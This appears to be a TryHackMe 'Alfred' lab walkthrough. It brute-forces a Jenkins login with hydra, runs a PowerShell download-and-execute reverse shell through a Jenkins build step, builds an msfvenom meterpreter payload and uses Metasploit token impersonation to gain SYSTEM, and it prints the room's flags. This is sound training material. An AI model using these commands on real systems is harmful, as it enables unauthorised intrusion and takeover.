
Alfred

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

https://tryhackme.com/room/alfred


Task 1 - Initial Access

In this room, we'll learn how to exploit a common misconfiguration on a widely used automation server (Jenkins, a tool used to build continuous integration/continuous deployment pipelines that let developers automatically deploy their code once they have made changes to it). After that, we'll use an interesting privilege escalation method to get full system access.

Since this is a Windows application, we’ll be using Nishang to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we’ll be using the reverse shell scripts.

Answer the questions below

How many ports are open? (TCP only)

┌──(0xskar㉿cocokali)-[~/thm/rooms/alfred]
└─$ sudo nmap -sT -T4 10.10.112.98 -Pn -sC
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-19 01:00 PDT
Nmap scan report for 10.10.112.98
Host is up (0.19s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  ms-wbt-server
|_ssl-date: 2022-06-19T08:00:36+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: ALFRED
|   NetBIOS_Domain_Name: ALFRED
|   NetBIOS_Computer_Name: ALFRED
|   DNS_Domain_Name: alfred
|   DNS_Computer_Name: alfred
|   Product_Version: 6.1.7601
|_  System_Time: 2022-06-19T08:00:36+00:00
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2022-06-18T07:20:36
|_Not valid after:  2022-12-18T07:20:36
8080/tcp open  http-proxy
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry 
|_/
  • 3

What is the username and password for the login panel (in the format username:password)?

http://10.10.112.98:8080/login

A quick Google search shows the default Jenkins login is admin/password, but that password doesn't work here, so we need to find it.

Intercepting the login request in the Burp Suite proxy, we can see it is a POST request to /j_acegi_security_check.

  • Let's use hydra to brute-force the login:

hydra -t 16 -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt 10.10.21.129 -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password"


Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it:

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

You first need to download the PowerShell script and make it available for the server to download. You can do this by creating an HTTP server with Python: python3 -m http.server

What is the user.txt flag?

  1. wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
  2. python3 -m http.server
  3. Paste the following into the Jenkins project's Configure page (as a build step): powershell iex (New-Object Net.WebClient).DownloadString('http://10.x.x.x:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.x.x.x -Port 6667

PS C:\users\bruce\Desktop> type user.txt
79007a09481963edf2e1321abd9ae2a0


Task 2 - Switching Shells

  1. Create the payload: msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.x.x.x LPORT=6666 -f exe -o shell.exe
  2. Start a new Jenkins project with the copied settings and input the next command into it.
  3. Command to download the payload to the target: powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.x.x.x:8000/shell.exe','shell.exe')"
  4. Set up the listener in msfconsole on Kali:
     use exploit/multi/handler
     set PAYLOAD windows/meterpreter/reverse_tcp
     set LHOST 10.x.x.x
     set LPORT 6666
     run
  5. Traverse to the directory containing shell.exe and, in the first PowerShell session, start the meterpreter reverse shell: Start-Process "shell.exe"


Answer the questions below

What is the final size of the exe payload that you generated?

  • 73802

Task 3 - Privilege Escalation

Notes:

  • Access tokens are assigned to an account when users log in or otherwise authenticate.
  • This is done by LSASS.exe (the Local Security Authority Subsystem Service).
  • An access token consists of the user's SID, group SIDs and the token's privileges.
  • https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens

The most commonly abused privileges:

  • SeImpersonatePrivilege
  • SeAssignPrimaryTokenPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege
  • https://www.exploit-db.com/papers/42556

Answer the questions below

View all the privileges using whoami /priv

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled
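As an added example that is not part of the original writeup, a small Python check that parses whoami /priv output and flags which of the commonly abused privileges from the notes above are enabled, and which are merely held (Disabled, but a privilege present in the token can be enabled by its holder). The sample input is a constructed excerpt in the same format as the output above:

```python
import re
from typing import Dict, List

# Privileges most often abused for escalation (the list from the notes above;
# the page's "SeAssignPrimaryPrivilege" is SeAssignPrimaryTokenPrivilege).
ABUSED_PRIVILEGES = frozenset({
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeTcbPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeCreateTokenPrivilege",
    "SeLoadDriverPrivilege", "SeTakeOwnershipPrivilege", "SeDebugPrivilege",
})

# One table row: privilege name, free-text description, then Enabled/Disabled.
_ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(output: str) -> Dict[str, bool]:
    """Map each privilege name to True if Enabled, False if Disabled."""
    privs: Dict[str, bool] = {}
    for line in output.splitlines():
        m = _ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3) == "Enabled"
    return privs


def flag_risky(privs: Dict[str, bool]) -> Dict[str, List[str]]:
    """Split the abused privileges into those enabled right now and those the
    token merely holds (Disabled, but the holder can enable them at will)."""
    enabled = sorted(p for p, on in privs.items() if on and p in ABUSED_PRIVILEGES)
    held = sorted(p for p, on in privs.items() if not on and p in ABUSED_PRIVILEGES)
    return {"enabled": enabled, "held_disabled": held}


# Constructed excerpt in the format whoami /priv prints (subset of the rows above).
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
"""

if __name__ == "__main__":
    report = flag_risky(parse_whoami_priv(SAMPLE))
    print("Enabled abused privileges:", ", ".join(report["enabled"]))
    print("Held but disabled:", ", ".join(report["held_disabled"]))
```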

You can see that two privileges (SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let's use the incognito module, which lets us abuse these privileges. Enter: load incognito to load the incognito module in Metasploit. Please note, you may need to use the use incognito command if the previous command doesn't work. Also ensure that your Metasploit is up to date.

  • load incognito

To check which tokens are available, enter list_tokens -g. We can see that the BUILTIN\Administrators token is available. Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators token. What is the output when you run the getuid command?

  • list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\TrkWks
NT SERVICE\TrustedInstaller
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\wscsvc

  • impersonate_token "BUILTIN\Administrators"

meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Even though you have a higher privileged token, you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions: it uses the primary token of the process, not the impersonated token, to determine what the process can or cannot do). Ensure that you migrate to a process with the correct permissions (the user from the previous answer). The safest process to pick is the services.exe process. First use the ps command to view processes and find the PID of the services.exe process, then migrate to it using the command migrate PID-OF-PROCESS.

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 396   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 524   516   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 572   564   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 580   516   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 608   564   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 668   580   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
meterpreter > migrate 668
[*] Migrating from 2632 to 668...
[*] Migration completed successfully.

Read the root.txt file at C:\Windows\System32\config.

meterpreter > shell
Process 2840 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd c:\Windows\System32\config
cd c:\Windows\System32\config

c:\Windows\System32\config>type root.txt
type root.txt
dff0f748678f280250f25a45b8046b4a

This post is licensed under CC BY 4.0 by the author.